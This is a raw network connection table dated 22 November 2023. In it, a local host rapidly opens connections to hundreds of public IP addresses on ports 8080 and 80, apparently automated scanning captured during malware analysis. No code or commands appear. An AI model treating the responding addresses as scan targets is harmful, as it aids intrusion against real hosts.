Nov 22, 2023 08:37:53.105549097 CET	54329	8080	192.168.2.23	95.230.28.19
Nov 22, 2023 08:37:53.105551004 CET	54329	8080	192.168.2.23	85.25.210.49
Nov 22, 2023 08:37:53.105562925 CET	54329	8080	192.168.2.23	62.174.19.28
Nov 22, 2023 08:37:53.105562925 CET	54329	8080	192.168.2.23	62.86.17.214
Nov 22, 2023 08:37:53.105572939 CET	54329	8080	192.168.2.23	31.21.132.249
Nov 22, 2023 08:37:53.105587006 CET	54329	8080	192.168.2.23	94.170.184.51
Nov 22, 2023 08:37:53.105587006 CET	54329	8080	192.168.2.23	95.178.3.9
Nov 22, 2023 08:37:53.105588913 CET	54329	8080	192.168.2.23	95.180.152.150
Nov 22, 2023 08:37:53.105597973 CET	54329	8080	192.168.2.23	95.151.179.76
Nov 22, 2023 08:37:53.105607986 CET	54329	8080	192.168.2.23	62.251.88.54
Nov 22, 2023 08:37:53.105616093 CET	54329	8080	192.168.2.23	62.21.13.8
Nov 22, 2023 08:37:53.105616093 CET	54329	8080	192.168.2.23	62.224.233.129
Nov 22, 2023 08:37:53.105616093 CET	54329	8080	192.168.2.23	85.145.58.56
Nov 22, 2023 08:37:53.105618954 CET	54329	8080	192.168.2.23	85.59.36.81
Nov 22, 2023 08:37:53.105618954 CET	54329	8080	192.168.2.23	31.152.204.150
Nov 22, 2023 08:37:53.105633020 CET	54329	8080	192.168.2.23	31.108.120.240
Nov 22, 2023 08:37:53.105643034 CET	54329	8080	192.168.2.23	94.252.49.240
Nov 22, 2023 08:37:53.105643034 CET	54329	8080	192.168.2.23	62.90.93.202
Nov 22, 2023 08:37:53.105659008 CET	54329	8080	192.168.2.23	62.161.219.211
Nov 22, 2023 08:37:53.105662107 CET	54329	8080	192.168.2.23	31.182.163.165
Nov 22, 2023 08:37:53.105664968 CET	54329	8080	192.168.2.23	94.161.182.107
Nov 22, 2023 08:37:53.105669975 CET	54329	8080	192.168.2.23	85.96.85.97
Nov 22, 2023 08:37:53.105675936 CET	54329	8080	192.168.2.23	94.42.229.139
Nov 22, 2023 08:37:53.105683088 CET	54329	8080	192.168.2.23	31.250.39.99
Nov 22, 2023 08:37:53.105694056 CET	54329	8080	192.168.2.23	85.189.49.160
Nov 22, 2023 08:37:53.105694056 CET	54329	8080	192.168.2.23	31.191.95.153
Nov 22, 2023 08:37:53.105710983 CET	54329	8080	192.168.2.23	85.145.45.172
Nov 22, 2023 08:37:53.105711937 CET	54329	8080	192.168.2.23	31.158.232.159
Nov 22, 2023 08:37:53.105711937 CET	54329	8080	192.168.2.23	95.140.247.92
Nov 22, 2023 08:37:53.105721951 CET	54329	8080	192.168.2.23	85.96.231.159
Nov 22, 2023 08:37:53.105722904 CET	54329	8080	192.168.2.23	94.165.93.2
Nov 22, 2023 08:37:53.105725050 CET	54329	8080	192.168.2.23	62.170.54.56
Nov 22, 2023 08:37:53.105727911 CET	54329	8080	192.168.2.23	62.172.184.57
Nov 22, 2023 08:37:53.105732918 CET	54329	8080	192.168.2.23	95.246.252.59
Nov 22, 2023 08:37:53.105736971 CET	54329	8080	192.168.2.23	85.247.160.89
Nov 22, 2023 08:37:53.105745077 CET	54329	8080	192.168.2.23	62.123.11.114
Nov 22, 2023 08:37:53.105751038 CET	54329	8080	192.168.2.23	95.35.139.162
Nov 22, 2023 08:37:53.105756044 CET	54329	8080	192.168.2.23	31.50.208.169
Nov 22, 2023 08:37:53.105772018 CET	54329	8080	192.168.2.23	95.113.38.131
Nov 22, 2023 08:37:53.105777025 CET	54329	8080	192.168.2.23	62.148.40.251
Nov 22, 2023 08:37:53.105777025 CET	54329	8080	192.168.2.23	85.238.247.103
Nov 22, 2023 08:37:53.105777979 CET	54329	8080	192.168.2.23	94.209.103.192
Nov 22, 2023 08:37:53.105787039 CET	54329	8080	192.168.2.23	85.245.143.244
Nov 22, 2023 08:37:53.105801105 CET	54329	8080	192.168.2.23	94.229.141.39
Nov 22, 2023 08:37:53.105804920 CET	54329	8080	192.168.2.23	31.252.45.36
Nov 22, 2023 08:37:53.105804920 CET	54329	8080	192.168.2.23	95.95.245.146
Nov 22, 2023 08:37:53.105804920 CET	54329	8080	192.168.2.23	95.20.129.52
Nov 22, 2023 08:37:53.105804920 CET	54329	8080	192.168.2.23	94.47.170.10
Nov 22, 2023 08:37:53.105809927 CET	54329	8080	192.168.2.23	85.22.134.249
Nov 22, 2023 08:37:53.105813026 CET	54329	8080	192.168.2.23	62.83.107.107
Nov 22, 2023 08:37:53.105813026 CET	54329	8080	192.168.2.23	85.148.64.87
Nov 22, 2023 08:37:53.105817080 CET	54329	8080	192.168.2.23	94.122.37.139
Nov 22, 2023 08:37:53.105827093 CET	54329	8080	192.168.2.23	31.28.13.236
Nov 22, 2023 08:37:53.105829954 CET	54329	8080	192.168.2.23	94.174.60.151
Nov 22, 2023 08:37:53.105830908 CET	54329	8080	192.168.2.23	95.193.146.20
Nov 22, 2023 08:37:53.105850935 CET	54329	8080	192.168.2.23	85.102.233.252
Nov 22, 2023 08:37:53.105855942 CET	54329	8080	192.168.2.23	85.210.230.243
Nov 22, 2023 08:37:53.105856895 CET	54329	8080	192.168.2.23	62.71.166.1
Nov 22, 2023 08:37:53.105859995 CET	54329	8080	192.168.2.23	31.118.100.39
Nov 22, 2023 08:37:53.105863094 CET	54329	8080	192.168.2.23	62.69.58.61
Nov 22, 2023 08:37:53.105868101 CET	54329	8080	192.168.2.23	31.144.185.215
Nov 22, 2023 08:37:53.105868101 CET	54329	8080	192.168.2.23	94.229.206.140
Nov 22, 2023 08:37:53.105879068 CET	54329	8080	192.168.2.23	62.209.167.207
Nov 22, 2023 08:37:53.105880022 CET	54329	8080	192.168.2.23	85.29.26.21
Nov 22, 2023 08:37:53.105882883 CET	54329	8080	192.168.2.23	94.105.225.255
Nov 22, 2023 08:37:53.105901003 CET	54329	8080	192.168.2.23	95.217.4.227
Nov 22, 2023 08:37:53.105902910 CET	54329	8080	192.168.2.23	31.153.253.70
Nov 22, 2023 08:37:53.105915070 CET	54329	8080	192.168.2.23	95.93.87.92
Nov 22, 2023 08:37:53.105920076 CET	54329	8080	192.168.2.23	95.133.101.227
Nov 22, 2023 08:37:53.105921984 CET	54329	8080	192.168.2.23	62.56.154.128
Nov 22, 2023 08:37:53.105925083 CET	54329	8080	192.168.2.23	62.49.30.140
Nov 22, 2023 08:37:53.105932951 CET	54329	8080	192.168.2.23	95.201.146.106
Nov 22, 2023 08:37:53.105932951 CET	54329	8080	192.168.2.23	95.232.191.77
Nov 22, 2023 08:37:53.105933905 CET	54329	8080	192.168.2.23	94.3.186.93
Nov 22, 2023 08:37:53.105933905 CET	54329	8080	192.168.2.23	94.86.55.98
Nov 22, 2023 08:37:53.105933905 CET	54329	8080	192.168.2.23	31.73.231.81
Nov 22, 2023 08:37:53.105942965 CET	54329	8080	192.168.2.23	62.198.155.102
Nov 22, 2023 08:37:53.105951071 CET	54329	8080	192.168.2.23	85.186.62.134
Nov 22, 2023 08:37:53.105952978 CET	54329	8080	192.168.2.23	94.37.10.57
Nov 22, 2023 08:37:53.105952978 CET	54329	8080	192.168.2.23	62.69.253.180
Nov 22, 2023 08:37:53.105953932 CET	54329	8080	192.168.2.23	95.102.156.86
Nov 22, 2023 08:37:53.105964899 CET	54329	8080	192.168.2.23	95.26.202.252
Nov 22, 2023 08:37:53.105966091 CET	54329	8080	192.168.2.23	85.67.250.207
Nov 22, 2023 08:37:53.105969906 CET	54329	8080	192.168.2.23	94.1.148.96
Nov 22, 2023 08:37:53.105973959 CET	54329	8080	192.168.2.23	94.27.159.40
Nov 22, 2023 08:37:53.105978012 CET	54329	8080	192.168.2.23	31.141.121.42
Nov 22, 2023 08:37:53.105992079 CET	54329	8080	192.168.2.23	62.116.61.159
Nov 22, 2023 08:37:53.105997086 CET	54329	8080	192.168.2.23	62.95.151.38
Nov 22, 2023 08:37:53.106000900 CET	54329	8080	192.168.2.23	85.234.139.134
Nov 22, 2023 08:37:53.106004000 CET	54329	8080	192.168.2.23	95.169.88.36
Nov 22, 2023 08:37:53.106009007 CET	54329	8080	192.168.2.23	62.247.67.14
Nov 22, 2023 08:37:53.106015921 CET	54329	8080	192.168.2.23	31.72.11.169
Nov 22, 2023 08:37:53.106018066 CET	54329	8080	192.168.2.23	94.86.218.168
Nov 22, 2023 08:37:53.106021881 CET	54329	8080	192.168.2.23	85.225.3.5
Nov 22, 2023 08:37:53.106026888 CET	54329	8080	192.168.2.23	85.206.132.223
Nov 22, 2023 08:37:53.106036901 CET	54329	8080	192.168.2.23	94.141.125.233
Nov 22, 2023 08:37:53.106040955 CET	54329	8080	192.168.2.23	95.216.174.79
Nov 22, 2023 08:37:53.106041908 CET	54329	8080	192.168.2.23	95.84.133.191
Nov 22, 2023 08:37:53.106050014 CET	54329	8080	192.168.2.23	94.16.67.150
Nov 22, 2023 08:37:53.106051922 CET	54329	8080	192.168.2.23	62.97.234.167
Nov 22, 2023 08:37:53.106051922 CET	54329	8080	192.168.2.23	31.50.77.94
Nov 22, 2023 08:37:53.106065989 CET	54329	8080	192.168.2.23	95.92.212.120
Nov 22, 2023 08:37:53.106066942 CET	54329	8080	192.168.2.23	95.80.4.5
Nov 22, 2023 08:37:53.106070995 CET	54329	8080	192.168.2.23	31.197.217.208
Nov 22, 2023 08:37:53.106074095 CET	54329	8080	192.168.2.23	95.227.196.255
Nov 22, 2023 08:37:53.106084108 CET	54329	8080	192.168.2.23	85.105.175.225
Nov 22, 2023 08:37:53.106086969 CET	54329	8080	192.168.2.23	62.238.135.254
Nov 22, 2023 08:37:53.106093884 CET	54329	8080	192.168.2.23	95.187.121.92
Nov 22, 2023 08:37:53.106106043 CET	54329	8080	192.168.2.23	95.135.83.85
Nov 22, 2023 08:37:53.106110096 CET	54329	8080	192.168.2.23	85.78.148.168
Nov 22, 2023 08:37:53.106112957 CET	54329	8080	192.168.2.23	85.134.190.246
Nov 22, 2023 08:37:53.106115103 CET	54329	8080	192.168.2.23	62.112.194.28
Nov 22, 2023 08:37:53.106115103 CET	54329	8080	192.168.2.23	85.101.183.68
Nov 22, 2023 08:37:53.106133938 CET	54329	8080	192.168.2.23	85.160.10.51
Nov 22, 2023 08:37:53.106134892 CET	54329	8080	192.168.2.23	85.119.81.193
Nov 22, 2023 08:37:53.106136084 CET	54329	8080	192.168.2.23	95.105.85.174
Nov 22, 2023 08:37:53.106152058 CET	54329	8080	192.168.2.23	85.67.22.10
Nov 22, 2023 08:37:53.106153965 CET	54329	8080	192.168.2.23	95.74.139.17
Nov 22, 2023 08:37:53.106157064 CET	54329	8080	192.168.2.23	31.237.249.183
Nov 22, 2023 08:37:53.106163025 CET	54329	8080	192.168.2.23	31.76.127.211
Nov 22, 2023 08:37:53.106163025 CET	54329	8080	192.168.2.23	85.96.52.81
Nov 22, 2023 08:37:53.106167078 CET	54329	8080	192.168.2.23	31.169.45.83
Nov 22, 2023 08:37:53.106170893 CET	54329	8080	192.168.2.23	62.97.226.229
Nov 22, 2023 08:37:53.106185913 CET	54329	8080	192.168.2.23	31.231.86.212
Nov 22, 2023 08:37:53.106198072 CET	54329	8080	192.168.2.23	62.255.3.216
Nov 22, 2023 08:37:53.106215954 CET	54329	8080	192.168.2.23	85.178.116.240
Nov 22, 2023 08:37:53.106215954 CET	54329	8080	192.168.2.23	31.182.6.54
Nov 22, 2023 08:37:53.143098116 CET	80	35598	95.161.196.170	192.168.2.23
Nov 22, 2023 08:37:53.143167973 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.143230915 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.143246889 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.143254995 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.143265009 CET	41616	80	192.168.2.23	95.216.96.250
Nov 22, 2023 08:37:53.143312931 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.143312931 CET	35598	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.143312931 CET	35608	80	192.168.2.23	95.161.196.170
Nov 22, 2023 08:37:53.150690079 CET	80	54328	95.126.80.210	192.168.2.23
Nov 22, 2023 08:37:53.254196882 CET	37215	54335	197.128.218.202	192.168.2.23
Nov 22, 2023 08:37:53.279525995 CET	8080	54329	31.33.14.237	192.168.2.23
Nov 22, 2023 08:37:53.279675961 CET	54329	8080	192.168.2.23	31.33.14.237
Nov 22, 2023 08:37:53.284439087 CET	8080	54329	85.91.7.67	192.168.2.23
Nov 22, 2023 08:37:53.292273998 CET	8080	54329	85.10.207.147	192.168.2.23
Nov 22, 2023 08:37:53.293252945 CET	80	54328	95.205.199.100	192.168.2.23
Nov 22, 2023 08:37:53.293801069 CET	8080	54329	62.159.9.28	192.168.2.23
Nov 22, 2023 08:37:53.295233965 CET	8080	54329	85.71.244.246	192.168.2.23
Nov 22, 2023 08:37:53.299391031 CET	8080	54329	62.83.46.171	192.168.2.23
Nov 22, 2023 08:37:53.299488068 CET	51792	8080	192.168.2.23	94.238.153.128
Nov 22, 2023 08:37:53.303417921 CET	8080	54329	94.112.88.16	192.168.2.23
Nov 22, 2023 08:37:53.305613995 CET	8080	54329	94.227.164.251	192.168.2.23
Nov 22, 2023 08:37:53.307255030 CET	8080	54329	85.214.104.60	192.168.2.23
Nov 22, 2023 08:37:53.308501005 CET	8080	54329	85.143.215.98	192.168.2.23
Nov 22, 2023 08:37:53.311374903 CET	8080	54329	95.247.124.41	192.168.2.23
Nov 22, 2023 08:37:53.311517000 CET	54329	8080	192.168.2.23	95.247.124.41
Nov 22, 2023 08:37:53.314817905 CET	8080	54329	94.247.209.130	192.168.2.23
Nov 22, 2023 08:37:53.315063000 CET	8080	54329	85.11.113.97	192.168.2.23
Nov 22, 2023 08:37:53.315206051 CET	8080	54329	85.198.229.199	192.168.2.23
Nov 22, 2023 08:37:53.320621014 CET	8080	54329	94.122.222.63	192.168.2.23
Nov 22, 2023 08:37:53.320668936 CET	54329	8080	192.168.2.23	94.122.222.63
Nov 22, 2023 08:37:53.324147940 CET	80	43618	95.101.247.189	192.168.2.23
Nov 22, 2023 08:37:53.324212074 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.324367046 CET	54328	80	192.168.2.23	112.201.75.195
Nov 22, 2023 08:37:53.324409008 CET	54328	80	192.168.2.23	112.78.71.54
Nov 22, 2023 08:37:53.324440002 CET	54328	80	192.168.2.23	112.15.25.227
Nov 22, 2023 08:37:53.324456930 CET	54328	80	192.168.2.23	112.38.17.129
Nov 22, 2023 08:37:53.324476957 CET	54328	80	192.168.2.23	112.216.72.241
Nov 22, 2023 08:37:53.324477911 CET	54328	80	192.168.2.23	112.159.163.54
Nov 22, 2023 08:37:53.324489117 CET	54328	80	192.168.2.23	112.33.87.160
Nov 22, 2023 08:37:53.324517012 CET	54328	80	192.168.2.23	112.184.62.198
Nov 22, 2023 08:37:53.324522972 CET	54328	80	192.168.2.23	112.83.197.76
Nov 22, 2023 08:37:53.324541092 CET	54328	80	192.168.2.23	112.46.192.37
Nov 22, 2023 08:37:53.324568033 CET	54328	80	192.168.2.23	112.251.232.73
Nov 22, 2023 08:37:53.324584961 CET	54328	80	192.168.2.23	112.148.216.181
Nov 22, 2023 08:37:53.324611902 CET	54328	80	192.168.2.23	112.201.133.235
Nov 22, 2023 08:37:53.324613094 CET	54328	80	192.168.2.23	112.12.30.12
Nov 22, 2023 08:37:53.324683905 CET	54328	80	192.168.2.23	112.30.34.210
Nov 22, 2023 08:37:53.324683905 CET	54328	80	192.168.2.23	112.24.240.99
Nov 22, 2023 08:37:53.324686050 CET	54328	80	192.168.2.23	112.101.12.204
Nov 22, 2023 08:37:53.324698925 CET	54328	80	192.168.2.23	112.128.189.162
Nov 22, 2023 08:37:53.324733019 CET	54328	80	192.168.2.23	112.129.168.234
Nov 22, 2023 08:37:53.324733019 CET	54328	80	192.168.2.23	112.98.80.62
Nov 22, 2023 08:37:53.324740887 CET	54328	80	192.168.2.23	112.70.240.113
Nov 22, 2023 08:37:53.324769974 CET	54328	80	192.168.2.23	112.175.136.190
Nov 22, 2023 08:37:53.324790955 CET	54328	80	192.168.2.23	112.137.10.85
Nov 22, 2023 08:37:53.324794054 CET	54328	80	192.168.2.23	112.61.51.15
Nov 22, 2023 08:37:53.324805975 CET	54328	80	192.168.2.23	112.41.123.68
Nov 22, 2023 08:37:53.324826002 CET	54328	80	192.168.2.23	112.51.152.250
Nov 22, 2023 08:37:53.324843884 CET	54328	80	192.168.2.23	112.204.29.227
Nov 22, 2023 08:37:53.324871063 CET	54328	80	192.168.2.23	112.209.105.205
Nov 22, 2023 08:37:53.324887037 CET	54328	80	192.168.2.23	112.85.63.149
Nov 22, 2023 08:37:53.324918032 CET	54328	80	192.168.2.23	112.183.249.195
Nov 22, 2023 08:37:53.324954033 CET	54328	80	192.168.2.23	112.40.137.217
Nov 22, 2023 08:37:53.324965954 CET	54328	80	192.168.2.23	112.185.107.151
Nov 22, 2023 08:37:53.324980021 CET	54328	80	192.168.2.23	112.230.156.170
Nov 22, 2023 08:37:53.324980021 CET	54328	80	192.168.2.23	112.43.166.94
Nov 22, 2023 08:37:53.324981928 CET	54328	80	192.168.2.23	112.40.119.210
Nov 22, 2023 08:37:53.325011969 CET	54328	80	192.168.2.23	112.15.68.15
Nov 22, 2023 08:37:53.325021982 CET	54328	80	192.168.2.23	112.54.19.79
Nov 22, 2023 08:37:53.325036049 CET	54328	80	192.168.2.23	112.47.166.202
Nov 22, 2023 08:37:53.325047016 CET	54328	80	192.168.2.23	112.188.164.160
Nov 22, 2023 08:37:53.325083971 CET	54328	80	192.168.2.23	112.16.124.58
Nov 22, 2023 08:37:53.325087070 CET	54328	80	192.168.2.23	112.94.236.64
Nov 22, 2023 08:37:53.325097084 CET	54328	80	192.168.2.23	112.245.213.154
Nov 22, 2023 08:37:53.325118065 CET	54328	80	192.168.2.23	112.25.158.0
Nov 22, 2023 08:37:53.325149059 CET	54328	80	192.168.2.23	112.161.171.16
Nov 22, 2023 08:37:53.325174093 CET	54328	80	192.168.2.23	112.107.88.241
Nov 22, 2023 08:37:53.325207949 CET	54328	80	192.168.2.23	112.136.151.41
Nov 22, 2023 08:37:53.325212955 CET	54328	80	192.168.2.23	112.98.116.34
Nov 22, 2023 08:37:53.325234890 CET	54328	80	192.168.2.23	112.37.202.164
Nov 22, 2023 08:37:53.325258017 CET	54328	80	192.168.2.23	112.226.107.146
Nov 22, 2023 08:37:53.325272083 CET	54328	80	192.168.2.23	112.67.249.210
Nov 22, 2023 08:37:53.325283051 CET	54328	80	192.168.2.23	112.210.194.25
Nov 22, 2023 08:37:53.325324059 CET	54328	80	192.168.2.23	112.203.252.138
Nov 22, 2023 08:37:53.325340033 CET	54328	80	192.168.2.23	112.155.232.227
Nov 22, 2023 08:37:53.325351954 CET	54328	80	192.168.2.23	112.236.194.113
Nov 22, 2023 08:37:53.325371981 CET	54328	80	192.168.2.23	112.124.243.230
Nov 22, 2023 08:37:53.325400114 CET	54328	80	192.168.2.23	112.74.197.104
Nov 22, 2023 08:37:53.325452089 CET	54328	80	192.168.2.23	112.212.212.42
Nov 22, 2023 08:37:53.325459003 CET	54328	80	192.168.2.23	112.188.144.226
Nov 22, 2023 08:37:53.325459957 CET	54328	80	192.168.2.23	112.221.72.38
Nov 22, 2023 08:37:53.325480938 CET	54328	80	192.168.2.23	112.241.229.18
Nov 22, 2023 08:37:53.325500965 CET	54328	80	192.168.2.23	112.44.188.118
Nov 22, 2023 08:37:53.325509071 CET	54328	80	192.168.2.23	112.243.178.95
Nov 22, 2023 08:37:53.325519085 CET	54328	80	192.168.2.23	112.221.111.81
Nov 22, 2023 08:37:53.325539112 CET	54328	80	192.168.2.23	112.224.178.157
Nov 22, 2023 08:37:53.325557947 CET	54328	80	192.168.2.23	112.236.165.179
Nov 22, 2023 08:37:53.325573921 CET	54328	80	192.168.2.23	112.144.195.104
Nov 22, 2023 08:37:53.325592995 CET	54328	80	192.168.2.23	112.193.12.1
Nov 22, 2023 08:37:53.325608015 CET	54328	80	192.168.2.23	112.147.137.231
Nov 22, 2023 08:37:53.325622082 CET	54328	80	192.168.2.23	112.4.215.162
Nov 22, 2023 08:37:53.325634003 CET	54328	80	192.168.2.23	112.220.37.125
Nov 22, 2023 08:37:53.325684071 CET	54328	80	192.168.2.23	112.184.2.156
Nov 22, 2023 08:37:53.325696945 CET	54328	80	192.168.2.23	112.240.157.17
Nov 22, 2023 08:37:53.325697899 CET	54328	80	192.168.2.23	112.127.195.0
Nov 22, 2023 08:37:53.325714111 CET	54328	80	192.168.2.23	112.191.206.84
Nov 22, 2023 08:37:53.325732946 CET	54328	80	192.168.2.23	112.189.222.95
Nov 22, 2023 08:37:53.325746059 CET	54328	80	192.168.2.23	112.202.143.134
Nov 22, 2023 08:37:53.325758934 CET	54328	80	192.168.2.23	112.170.131.98
Nov 22, 2023 08:37:53.325776100 CET	54328	80	192.168.2.23	112.171.163.242
Nov 22, 2023 08:37:53.325804949 CET	54328	80	192.168.2.23	112.4.113.190
Nov 22, 2023 08:37:53.325824976 CET	54328	80	192.168.2.23	112.146.206.241
Nov 22, 2023 08:37:53.325829983 CET	54328	80	192.168.2.23	112.77.144.119
Nov 22, 2023 08:37:53.325862885 CET	54328	80	192.168.2.23	112.30.1.77
Nov 22, 2023 08:37:53.325881004 CET	54328	80	192.168.2.23	112.141.245.249
Nov 22, 2023 08:37:53.325916052 CET	54328	80	192.168.2.23	112.241.58.165
Nov 22, 2023 08:37:53.325916052 CET	54328	80	192.168.2.23	112.141.199.81
Nov 22, 2023 08:37:53.325932026 CET	54328	80	192.168.2.23	112.15.167.96
Nov 22, 2023 08:37:53.325942993 CET	54328	80	192.168.2.23	112.51.142.111
Nov 22, 2023 08:37:53.325963974 CET	54328	80	192.168.2.23	112.221.169.9
Nov 22, 2023 08:37:53.326001883 CET	54328	80	192.168.2.23	112.224.44.228
Nov 22, 2023 08:37:53.326042891 CET	54328	80	192.168.2.23	112.248.254.170
Nov 22, 2023 08:37:53.326057911 CET	54328	80	192.168.2.23	112.191.242.193
Nov 22, 2023 08:37:53.326071978 CET	54328	80	192.168.2.23	112.249.46.22
Nov 22, 2023 08:37:53.326086044 CET	54328	80	192.168.2.23	112.18.43.147
Nov 22, 2023 08:37:53.326118946 CET	54328	80	192.168.2.23	112.127.119.225
Nov 22, 2023 08:37:53.326121092 CET	54328	80	192.168.2.23	112.69.98.102
Nov 22, 2023 08:37:53.326134920 CET	54328	80	192.168.2.23	112.160.195.21
Nov 22, 2023 08:37:53.326148987 CET	54328	80	192.168.2.23	112.22.152.67
Nov 22, 2023 08:37:53.326169014 CET	54328	80	192.168.2.23	112.10.52.189
Nov 22, 2023 08:37:53.326189041 CET	54328	80	192.168.2.23	112.254.3.63
Nov 22, 2023 08:37:53.326199055 CET	54328	80	192.168.2.23	112.27.51.110
Nov 22, 2023 08:37:53.326232910 CET	54328	80	192.168.2.23	112.220.78.186
Nov 22, 2023 08:37:53.326236010 CET	54328	80	192.168.2.23	112.197.162.115
Nov 22, 2023 08:37:53.326255083 CET	54328	80	192.168.2.23	112.23.22.163
Nov 22, 2023 08:37:53.326284885 CET	54328	80	192.168.2.23	112.109.55.36
Nov 22, 2023 08:37:53.326299906 CET	54328	80	192.168.2.23	112.123.100.37
Nov 22, 2023 08:37:53.326308966 CET	54328	80	192.168.2.23	112.17.229.7
Nov 22, 2023 08:37:53.326311111 CET	54328	80	192.168.2.23	112.158.24.255
Nov 22, 2023 08:37:53.326334953 CET	54328	80	192.168.2.23	112.205.76.234
Nov 22, 2023 08:37:53.326350927 CET	54328	80	192.168.2.23	112.116.97.100
Nov 22, 2023 08:37:53.326364994 CET	54328	80	192.168.2.23	112.194.220.150
Nov 22, 2023 08:37:53.326400042 CET	54328	80	192.168.2.23	112.248.4.16
Nov 22, 2023 08:37:53.326400042 CET	54328	80	192.168.2.23	112.238.179.212
Nov 22, 2023 08:37:53.326414108 CET	54328	80	192.168.2.23	112.9.147.228
Nov 22, 2023 08:37:53.326446056 CET	54328	80	192.168.2.23	112.82.109.88
Nov 22, 2023 08:37:53.326451063 CET	54328	80	192.168.2.23	112.62.132.193
Nov 22, 2023 08:37:53.326455116 CET	54328	80	192.168.2.23	112.106.58.211
Nov 22, 2023 08:37:53.326473951 CET	54328	80	192.168.2.23	112.90.242.146
Nov 22, 2023 08:37:53.326493025 CET	54328	80	192.168.2.23	112.241.105.248
Nov 22, 2023 08:37:53.326505899 CET	54328	80	192.168.2.23	112.187.220.155
Nov 22, 2023 08:37:53.326544046 CET	54328	80	192.168.2.23	112.89.202.183
Nov 22, 2023 08:37:53.326555967 CET	54328	80	192.168.2.23	112.42.60.236
Nov 22, 2023 08:37:53.326582909 CET	54328	80	192.168.2.23	112.151.231.106
Nov 22, 2023 08:37:53.326606989 CET	54328	80	192.168.2.23	112.140.235.227
Nov 22, 2023 08:37:53.326615095 CET	54328	80	192.168.2.23	112.225.191.185
Nov 22, 2023 08:37:53.326659918 CET	54328	80	192.168.2.23	112.46.164.60
Nov 22, 2023 08:37:53.326678038 CET	54328	80	192.168.2.23	112.62.22.235
Nov 22, 2023 08:37:53.326698065 CET	54328	80	192.168.2.23	112.82.194.244
Nov 22, 2023 08:37:53.326714993 CET	54328	80	192.168.2.23	112.10.229.50
Nov 22, 2023 08:37:53.326725006 CET	54328	80	192.168.2.23	112.70.198.84
Nov 22, 2023 08:37:53.326778889 CET	54328	80	192.168.2.23	112.5.184.221
Nov 22, 2023 08:37:53.326780081 CET	54328	80	192.168.2.23	112.45.47.255
Nov 22, 2023 08:37:53.326780081 CET	54328	80	192.168.2.23	112.200.237.170
Nov 22, 2023 08:37:53.326793909 CET	54328	80	192.168.2.23	112.63.133.63
Nov 22, 2023 08:37:53.326807022 CET	54328	80	192.168.2.23	112.179.3.150
Nov 22, 2023 08:37:53.326826096 CET	54328	80	192.168.2.23	112.229.240.50
Nov 22, 2023 08:37:53.326850891 CET	54328	80	192.168.2.23	112.81.47.98
Nov 22, 2023 08:37:53.326879025 CET	54328	80	192.168.2.23	112.2.203.59
Nov 22, 2023 08:37:53.326893091 CET	54328	80	192.168.2.23	112.216.94.225
Nov 22, 2023 08:37:53.326920033 CET	54328	80	192.168.2.23	112.89.104.10
Nov 22, 2023 08:37:53.326934099 CET	54328	80	192.168.2.23	112.179.255.54
Nov 22, 2023 08:37:53.326956987 CET	54328	80	192.168.2.23	112.90.88.226
Nov 22, 2023 08:37:53.326981068 CET	54328	80	192.168.2.23	112.104.241.54
Nov 22, 2023 08:37:53.326984882 CET	54328	80	192.168.2.23	112.80.118.24
Nov 22, 2023 08:37:53.327003002 CET	54328	80	192.168.2.23	112.166.111.190
Nov 22, 2023 08:37:53.327029943 CET	54328	80	192.168.2.23	112.104.142.254
Nov 22, 2023 08:37:53.327047110 CET	54328	80	192.168.2.23	112.117.17.241
Nov 22, 2023 08:37:53.327100039 CET	54328	80	192.168.2.23	112.21.90.132
Nov 22, 2023 08:37:53.327101946 CET	54328	80	192.168.2.23	112.133.43.213
Nov 22, 2023 08:37:53.327120066 CET	54328	80	192.168.2.23	112.11.85.208
Nov 22, 2023 08:37:53.327126026 CET	54328	80	192.168.2.23	112.205.123.22
Nov 22, 2023 08:37:53.327146053 CET	54328	80	192.168.2.23	112.246.0.136
Nov 22, 2023 08:37:53.327157974 CET	54328	80	192.168.2.23	112.150.127.221
Nov 22, 2023 08:37:53.327176094 CET	54328	80	192.168.2.23	112.5.26.16
Nov 22, 2023 08:37:53.327202082 CET	54328	80	192.168.2.23	112.190.167.166
Nov 22, 2023 08:37:53.327217102 CET	54328	80	192.168.2.23	112.11.43.175
Nov 22, 2023 08:37:53.327230930 CET	54328	80	192.168.2.23	112.108.132.155
Nov 22, 2023 08:37:53.327253103 CET	54328	80	192.168.2.23	112.246.115.185
Nov 22, 2023 08:37:53.327271938 CET	54328	80	192.168.2.23	112.47.78.68
Nov 22, 2023 08:37:53.327285051 CET	54328	80	192.168.2.23	112.241.144.131
Nov 22, 2023 08:37:53.327306032 CET	54328	80	192.168.2.23	112.232.23.235
Nov 22, 2023 08:37:53.327357054 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.327357054 CET	43618	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.327393055 CET	43628	80	192.168.2.23	95.101.247.189
Nov 22, 2023 08:37:53.331826925 CET	80	53398	95.100.224.246	192.168.2.23
Nov 22, 2023 08:37:53.331891060 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.331912041 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.331912041 CET	53398	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.331934929 CET	53406	80	192.168.2.23	95.100.224.246
Nov 22, 2023 08:37:53.334497929 CET	8080	54329	85.16.98.220	192.168.2.23
Nov 22, 2023 08:37:53.336224079 CET	80	38088	95.100.227.33	192.168.2.23
Nov 22, 2023 08:37:53.336276054 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.336291075 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.336291075 CET	38088	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.336311102 CET	38100	80	192.168.2.23	95.100.227.33
Nov 22, 2023 08:37:53.336637020 CET	8080	54329	31.200.125.62	192.168.2.23
Nov 22, 2023 08:37:53.336687088 CET	54329	8080	192.168.2.23	31.200.125.62
Nov 22, 2023 08:37:53.336786032 CET	8080	54329	95.70.182.54	192.168.2.23
